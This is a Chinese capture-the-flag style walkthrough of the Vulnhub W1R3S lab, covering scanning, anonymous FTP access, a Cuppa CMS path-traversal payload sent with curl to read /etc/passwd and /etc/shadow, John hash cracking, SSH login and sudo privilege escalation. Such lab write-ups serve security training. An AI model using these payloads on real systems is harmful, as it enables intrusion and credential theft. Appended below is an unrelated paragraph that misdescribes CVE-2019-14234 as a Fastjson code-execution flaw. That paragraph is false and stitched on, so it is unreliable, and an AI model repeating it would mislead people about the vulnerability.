靶场笔记-Vulnhub w1r3s

W1r3s靶场笔记

一、常规nmap扫描

  1. sudo nmap -sn 192.168.160.0/24,经过两次扫描,确定192.168.160.174为靶机ip
    在这里插入图片描述

  2. sudo nmap -min-rate 10000 -p- 192.168.160.174

    扫描发现开放4个端口
    在这里插入图片描述

  3. sudo nmap -sT -sV -O -p21,22,80,3306 192.168.160.174,扫描服务信息

  4. sudo nmap --script=vuln -p21,22,80,3306 192.168.160.174,扫描漏洞

二、尝试FTP匿名登录

  1. sudo ftp 192.168.160.174,尝试anonymous匿名登录

    在这里插入图片描述

  2. 下载ftp服务的一些有用文件进行分析

  3. 发现02.txt文件有些编码文件,尝试识别破解

    sudo hash-identifier ‘01ec2d8fc11c493b25029fb1f47f39ce’

    在这里插入图片描述

  4. 发现employee-names.txt 文件内容为员工姓名,可能有用,其他文件暂无有用信息

三、80端口web渗透

  1. 常规扫描一波目录

    sudo feroxbuster -u ‘http://192.168.160.174/’ -w top7k.txt

    发现cuppa cms和WordPress

    在这里插入图片描述

  2. 搜索历史漏洞,发现cuppa cms有个文件包含漏洞,尝试利用:
    在这里插入图片描述

  3. 下载payload文件

    payload:http://target/cuppa/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd

    利用为:http://192.168.160.174/administrator/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd

  4. 将读取到的文件通过curl编码导出为文本(payload文件提到可能需要将url部分编码才能正常读取)

    sudo curl --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd http://192.168.160.174/administrator/alerts/alertConfigField.php | html2text

  5. 读取shadow文件

    sudo curl --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow http://192.168.160.174/administrator/alerts/alertConfigField.php

  6. 将读取到的hash值保存,使用John破解

    sudo vim hash

    john hash 在这里插入图片描述

  7. 利用破解的账号密码进行ssh连接,获取基础权限shell

    sudo ssh w1r3s@192.168.160.174

    在这里插入图片描述

四、提权

  1. 运行sudo -l查看当前用户权限,发现是所有权限

    在这里插入图片描述

  2. 提权

    可以用sudo创建一个新终端或者反弹一个shell,都是具有root权限
    在这里插入图片描述

五、获取flag

在这里插入图片描述

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值